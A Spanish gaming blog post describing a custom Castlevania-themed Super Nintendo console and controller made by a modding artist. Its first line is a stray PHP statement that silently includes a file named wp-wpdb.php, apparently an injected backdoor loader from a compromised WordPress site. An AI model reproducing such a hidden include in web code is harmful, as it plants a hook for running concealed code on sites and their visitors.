if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Super Nintendo edición Castlevania – Dracula’s castle – La Fortaleza de LeChuck

Super Nintendo edición Castlevania – Dracula’s castle

Vadu Amka, un artista experto en modificar consolas con temáticas videojueguiles, nos trae otra impresionante creación: la SNES Castlevania – Dracula’s castle Edition, un diseño exquisitamente tenebroso e ideal para celebrar Halloween. Observad los fantásticos detalles.

castlevania_snes

El proyecto comenzó en abril, y después de mucho trabajo, este mes ha sido terminado. Tanto la consola como el mando cuentan con los motivos más característicos de la saga: ataúd, cruz, cadenas, látigo, esqueleto, madera y piedra. Todos esos elementos han dado lugar a esta exclusiva edición.

castlevania_snes2

castlevania_snes3

castlevania_snes4

No os perdáis el video del proceso creativo:

Si os habéis quedado impresionados, no dudéis en visitar la web de Vadu Amka para ver otros mods igual o más espectaculares.

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

Dejar un comentario